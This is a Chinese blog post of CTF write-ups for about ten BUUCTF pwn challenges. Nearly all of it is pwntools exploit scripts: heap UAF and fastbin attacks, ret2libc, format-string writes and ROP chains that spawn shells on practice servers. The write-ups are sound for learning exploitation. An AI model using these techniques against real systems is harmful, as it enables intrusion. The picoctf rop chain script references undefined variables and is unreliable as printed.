BUUCTF pwn水题大赏(四)

最新推荐文章于 2022-11-01 09:16:50 发布
最新推荐文章于 2022-11-01 09:16:50 发布
阅读量371 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45878152/article/details/113617072
版权

BUUCTF pwn水题大赏

[BJDCTF2nd]ydsneedgirlfriend2

UAF漏洞,把 print 的位置覆盖成 backdoor 的地址,然后 show 就可以跳转到 backdoor
exp:

from pwn import*
context(arch='amd64',os='linux')
context.log_level = 'DEBUG'
#p=process('./ydsneedgirlfriend2')
p=remote('node3.buuoj.cn',29604)
flag=0x400D86

def add(length,name):
    p.sendlineafter('choice :', str(1))
    p.sendlineafter('the length of her name:', str(length))
    p.sendafter('her name:', name)

def dele(index):
    p.sendlineafter('choice :', str(2))
    p.sendlineafter('Index :',str(index))

def show(index):
    p.sendlineafter('choice :', str(3))
    p.sendlineafter('Index :',str(index))

add(0x30,'0')
add(0x10,'1')
dele(0)

add(0x10,p64(0x400D86)*2)
show(0)

#gdb.attach(p)
p.interactive()

babyheap_0ctf_2017

堆溢出
exp:

from pwn import*
context(log_level="debug")
context(arch='amd64',os='linux')
p=remote('node3.buuoj.cn',26222)
#p=process('./babyheap_0ctf_2017')
elf=ELF('./babyheap_0ctf_2017')

def add(size):
	p.sendlineafter(': ','1')
	p.sendlineafter('Size: ',str(size))

def edit(index,size,content):
	p.sendlineafter(':','2')
	p.sendlineafter('Index: ',str(index))
	p.sendlineafter('Size: ',str(size))
	p.sendlineafter('Content: ',content)

def free(index):
	p.sendlineafter(':','3')
	p.sendlineafter('Index: ',str(index))

def show(index):
	p.sendlineafter(':','4')
	p.sendlineafter('Index: ',str(index))

def exit():
	p.sendlineafter(':','5')

add(0x10)#0
add(0x10)#1
add(0x10)#2
add(0x10)#3
add(0x80)#4
free(1)
free(2)

payload=p64(0)*3+p64(0x21)+p64(0)*3+p64(0x21)+p8(0x80)
edit(0,len(payload),payload)

payload1=p64(0)*3+p64(0x21)
edit(3,len(payload1),payload1)

add(0x10)#1
add(0x10)#2
edit(1,4,'aaaa')
edit(2,4,'aaaa')

payload2=p64(0)*3+p64(0x91)
edit(3,len(payload2),payload2)

add(0x80)#5
free(4)
show(2)
leak=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libc_base=leak-0x3c4b78
print hex(libc_base)
print hex(leak)

add(0x60)#4
free(4)
payload3=p64(libc_base+0x3c4aed)
edit(2,len(payload3),payload3)
print hex(libc_base+0x3c4aed)
add(0x60)#4
add(0x60)#6
payload4=p8(0)*3+p64(0)*2+p64(libc_base+0x4526a)
edit(6,len(payload4),payload4)

add(255)

#gdb.attach(p)
p.interactive()

ciscn_2019_ne_5

system 函数的参数是 sh 的时候也可以得到权限( shgdb 的指令 find sh 找)
exp:

from pwn import*
context.log_level = 'DEBUG'
p=remote('node3.buuoj.cn',27800)
#p=process('./ciscn_2019_ne_5')
elf=ELF('./ciscn_2019_ne_5')

sys=0x80484D0
sh=0x80492ea
#gdb.attach(p)
p.sendlineafter('Please input admin password:','administrator')
payload='a'*0x48+'bbbb'+p32(sys)*2+p32(sh)
p.sendlineafter(':','1')
p.sendlineafter('info:',payload)
p.sendlineafter(':','4')
p.interactive()

[HarekazeCTF2019]baby_rop2

通过 printf 泄露 libc ,然后栈溢出( flaghome 文件里,可以用 find -name 'flag' 找)
exp:

from pwn import*
from LibcSearcher import*
context.log_level='debug'

#p=process('./babyrop2')
p=remote("node3.buuoj.cn",28858)
elf=ELF('babyrop2')

printf_plt=elf.plt['printf']
read_got=elf.got['read']
main_plt=elf.sym['main']

pop_rdi=0x0000000000400733
pop_rsi_r15=0x0000000000400731 
format_str=0x0000000000400770
ret_addr=0x0000000000400734

payload='a'*0x28+p64(pop_rdi)+p64(format_str)+p64(pop_rsi_r15)+p64(read_got)+p64(0)+p64(printf_plt)+p64(main_plt)

p.recvuntil("name? ")
p.sendline(payload)

read_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print hex(read_addr)

libc=LibcSearcher('read', read_addr)
libc_base=read_addr-libc.dump('read')
print hex(libc_base)

sys_addr=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')

payload='a'*0x28+p64(pop_rdi)+p64(bin_sh)+p64(sys_addr)+p64(0)
p.sendline(payload)
p.interactive()

jarvisoj_fm

x=4 ,找对 printf ,多 gdb 调试,偏移 11
exp:

from pwn import*
p=remote('node3.buuoj.cn',25621)
#p=process('./fm')
x=0x0804A02C
payload=p32(x)+'%11$n'
p.sendline(payload)
p.interactive()

pwn2_sctf_2016

用负数绕过 if ,用 printf 泄露 libc
exp:

from pwn import*
from LibcSearcher import*
context.log_level = 'DEBUG'
p=remote('node3.buuoj.cn',28484)
#p=process('./pwn2_sctf_2016')
elf=ELF('./pwn2_sctf_2016')

format_str=0x080486F8
printf_plt=elf.plt['printf']
main_addr=elf.symbols['main']
printf_got=elf.got['printf']

p.recvuntil('read? ')
p.sendline('-1')
p.recvuntil('data!\n')

payload1='a'*0x30+p32(printf_plt)+p32(main_addr)+p32(format_str)+p32(printf_got)
p.sendline(payload1)

p.recvuntil('said: ')
p.recvuntil('said: ')

printf_addr = u32(p.recv(4))
print hex(printf_addr)
#gdb.attach(p)
libc = LibcSearcher('printf', printf_addr)
libc_base=printf_addr-libc.dump('printf')
print hex(libc_base)
sys=libc_base+libc.dump('system')
binsh=libc_base+libc.dump('str_bin_sh')

p.recvuntil('read? ')
p.sendline('-1')
p.recvuntil('data!\n')
payload2='a'*0x30+p32(sys)+p32(main_addr)+p32(binsh)
p.sendline(payload2)
p.interactive()

jarvisoj_tell_me_something

栈溢出到 good_game 函数
exp:

from pwn import *
p=remote("node3.buuoj.cn","27384")
payload='a'*136+p64(0x0000000000400620)
p.recvuntil("\n")
p.send(payload)
p.interactive()

picoctf_2018_rop chain

gets 溢出给 win_function1win_functinon2的参数赋值,然后符合了 flag 函数的调用条件
exp:

from pwn import*
p=remote('node3.buuoj.cn',27082)
win=0x080485CB
win=0x080485D8
flag=0x0804862B
payload='a'*0x1c+p32(win1)+p32(win2)+p32(flag)+p32(0xBAAAAAAD)+p32(0xDEADBAAD)
p.sendlineafter('input> ',payload)
p.interactive()

cmcc_simplerop

栈溢出,将 /bin/sh 写入 bss 段,再系统调用
exp:

from pwn import*
#p=process('./simplerop')
p=remote('node3.buuoj.cn',29587)
pop_eax_ret=0x80bae06
pop_bcdx_ret=0x806e850
int_80=0x806EEF0
bss=0x80EB010

payload='a'*0x20+p32(pop_eax_ret)+p32(3)+p32(pop_bcdx_ret)+p32(8)+p32(bss)+p32(0)+p32(int_80)+p32(pop_eax_ret)+p32(11)+p32(pop_bcdx_ret)+p32(0)+p32(0)+p32(bss)+p32(int_80)

p.sendline(payload)
p.send('/bin/sh')
sleep(0.1)
p.interactive()

[ZJCTF 2019]Login

c++题目,用户名为 admin,密码为 2jctf_pa5sw0rd ,然后栈溢出到 /bin/sh
exp:

from pwn import*
p = remote('node3.buuoj.cn',26877)
p.sendlineafter('username: ','admin')
payload = '2jctf_pa5sw0r'+'\x00'*58+p64(0x400E88)
p.sendlineafter('password: ',payload)
p.interactive()
o琦野o
关注
专栏目录
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 984
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF pwn pwn2_sctf_2016
菜的只能随便写写博客
02-18 2508
0x01 分析   0x02 运行  程序读入一个长度,然后按照长度读入后面输入的data并回显。   0x03 IDA  数据长度被限制为32,无法溢出,接着查看get_n函数。  接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。   0x04 思路  输入负数长度,绕过长度检查,执行r...
BUUCTF Pwn pwn2_sctf_2016
MrTreebook的博客
03-13 336
BUUCTF Pwn pwn2_sctf_20161.checksec2.IDA32vuln函数漏洞利用3.exp 1.checksec 没有canary,方便溢出 没有PIE,构造ROP会方便很多 2.IDA32 vuln函数 int vuln() { char nptr[32]; // [esp+1Ch] [ebp-2Ch] BYREF int v2; // [esp+3Ch] [ebp-Ch] printf("How many bytes do you want me to rea
pwn2_sctf_2016
、moddemod
06-20 329
exp #!/usr/bin/env python # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level='debug') proc_name = './pwn2_sctf_2016' p = process(proc_name) # p = remote('node3.buuoj.cn', 26254) elf = ELF(proc_name) p.sendlineafter('read?', '-.
buuctf pwn2_sctf_2016
qq_42728977的博客
03-21 630
pwn2_sctf_2016 degree of difficulty: 2 source of the challenges:buuctf/sctf_2016 solving ideas:Stack overslow,atoi-function’s negative number overslow Put it in IDA32,we can see this easy program. l...
BUUCTF pwn水题大赏(三)
o琦野o的博客
02-03 379
BUUCTF pwn水题大赏21.铁人三项(第五赛区)_2018_rop22.bjdctf_2020_babyrop23.[BJDCTF 2nd]r2t424.[BJDCTF 2nd]test25.bjdctf_2020_babystack226.bjdctf_2020_babyrop227.bjdctf_2020_router28.others_babystack29.ciscn_2019_s_430.wdb2018_guess 21.铁人三项(第五赛区)_2018_rop 32位栈溢出,利用 write
BUUCTF pwn水题大赏(六)
o琦野o的博客
03-11 343
BUUCTF pwn水题大赏suctf_2018_stack suctf_2018_stack 最最最最最最基本的栈溢出,也不知道为啥会这么高分。 exp: from pwn import* context.log_level = 'DEBUG' p=remote('node3.buuoj.cn',28582) #p=process('./SUCTF_2018_stack') elf=ELF('./SUCTF_2018_stack') payload = 'a'*0x28+p64(0x0040067A)
BUUCTF pwn水题大赏(五)
o琦野o的博客
02-03 294
BUUCTF pwn水题大赏41.ciscn_2019_s_3 41.ciscn_2019_s_3 srop ,要注意 rsp 指向的位置。 exp: from pwn import* context.log_level = 'DEBUG' context.arch = 'amd64' p = remote('node3.buuoj.cn',29369) #p = process('./ciscn_s_3') elf = ELF('./ciscn_s_3') syscall_ret = 0x400517
BUUCTF pwn水题大赏(七)(更新中)
o琦野o的博客
04-02 173
BUUCTF pwn水题大赏wustctf2020_getshell wustctf2020_getshell 简单 32 位栈溢出。 exp: from pwn import* context.log_level = 'DEBUG' p=remote('node3.buuoj.cn',28411) #p=process('./wustctf2020_getshell') backdoor = 0x0804851B payload = 'a'*0x18+'a'*4+p32(backdoor) p.sen
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2070
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
【CTF】pwn2_sctf_2016
凉水的博客
07-16 923
pwn2_sctf_2016
BUUCTF pwn2_sctf2016
红叶的博客
11-01 493
本题难点:绕过字符串大小限制以及是否掌握了ret2libc。
BUUCTF-Pwn-pwn2_sctf_2016
餐桌上的猫
03-25 234
exp from pwn import* from LibcSearcher import * elf=ELF('/home/lhb/桌面/pwn2_sctf_2016') p=remote('node4.buuoj.cn',27385) printf_plt=elf.plt['printf'] printf_got=elf.got['printf'] main=0x80485b8 p.sendlineafter(b'read? ',b'-1') payload=b'a'*(0x2c+4)+p32(p
[BUUCTF-pwn]——pwn2_sctf_2016
Y_peak的博客
02-12 552
[BUUCTF-pwn]——pwn2_sctf_2016 题目地址: https://buuoj.cn/challenges#pwn2_sctf_2016 老规矩还是先checksec一下, 在IDA中看看, 这个get_n(a, b)的作用就是读入 b 个字符。将其合成的字符串赋值给a。 最常用的方法,也是我经常使用的方法就是利用 libc库 计算偏移。然后循环利用函数。只有printf函数可以打印, 找到需要用的地址。 思路 利用printf泄露printf的实际地址, 通过计算偏移,以此
buuctf pwn2_sctf_2016
carol2358的博客
04-22 264
32的libc rop 64位是7f(8位),32位是f7(4位) exp: from pwn import * from LibcSearcher import * local_file = './pwn2_sctf_2016' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' remote_libc = './libc.s...
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值